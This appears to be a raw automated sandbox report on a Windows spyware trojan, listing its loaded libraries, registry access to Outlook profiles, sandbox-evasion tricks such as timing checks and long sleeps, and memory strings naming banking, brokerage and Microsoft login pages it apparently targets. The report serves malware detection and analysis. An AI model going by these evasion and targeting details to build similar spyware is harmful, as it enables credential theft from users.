            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_360B1470
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_360B3008
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_360B1B50
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_360B2238
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_360B0D88
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_360B4BC7
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_360B2920
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_360B36E1
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_360B1467
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_360B1B3F
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_360B2229
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_360B0006
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_360B0040
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_360B2FF8
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_360B0D78
            Source: C:\Users\user\Desktop\________.exe | Code function: String function: 00402B3A appears 47 times
            Source: ________.exe | Static PE information: invalid certificate
            Source: ________.exe, 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenametipning husnummers.exe< vs ________.exe
            Source: ________.exe, 00000003.00000000.1614671770.0000000000453000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenametipning husnummers.exe< vs ________.exe
            Source: ________.exe, 00000003.00000002.3954718526.000000000261F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs ________.exe
            Source: ________.exe, 00000003.00000002.3975218220.0000000032977000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs ________.exe
            Source: ________.exe | Binary or memory string: OriginalFilenametipning husnummers.exe< vs ________.exe
            Source: ________.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/9@7/5
            Source: C:\Users\user\Desktop\________.exe | Code function: 1_2_004045CA GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\Desktop\________.exe | Code function: 1_2_0040206A CoCreateInstance
            Source: C:\Users\user\Desktop\________.exe | File created: C:\Users\user\AppData\Local\foreslaaende
            Source: C:\Users\user\Desktop\________.exe | Mutant created: NULL
            Source: C:\Users\user\Desktop\________.exe | File created: C:\Users\user\AppData\Local\Temp\nsaD100.tmp
            Source: ________.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\________.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\________.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: ________.exe | Virustotal: Detection: 8%
            Source: C:\Users\user\Desktop\________.exe | File read: C:\Users\user\Desktop\________.exe
            Source: unknown | Process created: C:\Users\user\Desktop\________.exe "C:\Users\user\Desktop\________.exe"
            Source: C:\Users\user\Desktop\________.exe | Process created: C:\Users\user\Desktop\________.exe "C:\Users\user\Desktop\________.exe"
            Source: C:\Users\user\Desktop\________.exe | Process created: C:\Users\user\Desktop\________.exe "C:\Users\user\Desktop\________.exe"
            Source: C:\Users\user\Desktop\________.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\________.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\________.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\________.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\________.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation

            Source: Yara match | File source: Process Memory Space: ________.exe PID: 2916, type: MEMORYSTR
            Source: Yara match | File source: 00000001.00000002.1623677806.000000000330D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\________.exe | Code function: 1_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00406254
            Source: C:\Users\user\Desktop\________.exe | Code function: 1_2_10002DA0 push eax; ret 1_2_10002DCE
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_3_0019CA98 pushfd ; retf 0019h 3_3_0019CA99
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_3_0019EE18 push eax; iretd 3_3_0019EE65
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_3_0019EE8C push eax; iretd 3_3_0019EEA9
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_3_0019CF4C push eax; iretd 3_3_0019CF4D
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_0015735D pushfd ; iretd 3_2_00157362
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_32D4942D push edi; ret 3_2_32D4942E
            Source: C:\Users\user\Desktop\________.exe | File created: C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dll
            Source: C:\Users\user\Desktop\________.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\________.exe | API/Special instruction interceptor: Address: 38943CF
            Source: C:\Users\user\Desktop\________.exe | API/Special instruction interceptor: Address: 1D443CF
            Source: C:\Users\user\Desktop\________.exe | RDTSC instruction interceptor: First address: 382DDF5 second address: 382DDF5 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F40AC74A083h 0x00000006 cmp al, cl 0x00000008 inc ebp 0x00000009 push edi 0x0000000a mov edi, 43D81CFAh 0x0000000f cmp edi, 000000C9h 0x00000015 jl 00007F40AC7B2217h 0x0000001b pop edi 0x0000001c inc ebx 0x0000001d cmp al, cl 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\________.exe | RDTSC instruction interceptor: First address: 1CDDDF5 second address: 1CDDDF5 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F40AD0784A3h 0x00000006 cmp al, cl 0x00000008 inc ebp 0x00000009 push edi 0x0000000a mov edi, 43D81CFAh 0x0000000f cmp edi, 000000C9h 0x00000015 jl 00007F40AD0E0637h 0x0000001b pop edi 0x0000001c inc ebx 0x0000001d cmp al, cl 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\________.exe | Memory allocated: 110000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\________.exe | Memory allocated: 32D60000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\________.exe | Memory allocated: 32AE0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 599875
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 599765
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 599656
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 599546
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 599437
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 599312
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 599187
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 599078
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 598968
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 598859
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 598750
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 598640
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 598531
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 598421
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 598312
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 598203
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 598093
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 597984
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 597874
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 597765
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 597656
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 597546
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 597437
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 597327
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 597203
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 597093
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 596984
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 596875
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 596765
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 596656
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 596546
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 596437
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 596328
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 596203
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 596093
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 595984
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 595874
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 595765
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 595656
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 595546
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 595437
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 595328
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 595210
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 595109
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 595000
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 594890
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 594781
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 594671
            Source: C:\Users\user\Desktop\________.exe | Thread delayed: delay time: 594562
            Source: C:\Users\user\Desktop\________.exe | Window / User API: threadDelayed 8536
            Source: C:\Users\user\Desktop\________.exe | Window / User API: threadDelayed 1318
            Source: C:\Users\user\Desktop\________.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nshD4CB.tmp\System.dll
            Source: C:\Users\user\Desktop\________.exe | API coverage: 1.7 %
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -24903104499507879s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -599875s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1468 | Thread sleep count: 8536 > 30
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -599765s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1468 | Thread sleep count: 1318 > 30
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -599656s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -599546s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -599437s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -599312s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -599187s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -599078s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -598968s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -598859s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -598750s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -598640s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -598531s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -598421s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -598312s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -598203s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -598093s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -597984s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -597874s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -597765s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -597656s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -597546s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -597437s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -597327s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -597203s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -597093s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -596984s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -596875s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -596765s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -596656s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -596546s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -596437s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -596328s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -596203s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -596093s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -595984s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -595874s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -595765s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -595656s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -595546s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -595437s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -595328s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -595210s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -595109s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -595000s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -594890s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -594781s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -594671s >= -30000s
            Source: C:\Users\user\Desktop\________.exe TID: 1936 | Thread sleep time: -594562s >= -30000s
            Source: C:\Users\user\Desktop\________.exe | Code function: 1_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405772
            Source: C:\Users\user\Desktop\________.exe | Code function: 1_2_0040622D FindFirstFileW,FindClose,1_2_0040622D
            Source: C:\Users\user\Desktop\________.exe | Code function: 1_2_00402770 FindFirstFileW,1_2_00402770
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_00402770 FindFirstFileW,3_2_00402770
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405772
            Source: C:\Users\user\Desktop\________.exe | Code function: 3_2_0040622D FindFirstFileW,FindClose,3_2_0040622D
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 595000Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 594890Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 594781Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 594671Jump to behavior
            Source: C:\Users\user\Desktop\________.exeThread delayed: delay time: 594562Jump to behavior
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: ________.exe, 00000003.00000002.3954718526.00000000025B8000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3954718526.000000000260E000.00000004.00000020.00020000.00000000.sdmp, ________.exe, 00000003.00000002.3954718526.00000000025F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: ________.exe, 00000003.00000002.3976863799.0000000033DF2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: ________.exe, 00000003.00000002.3976863799.0000000034111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
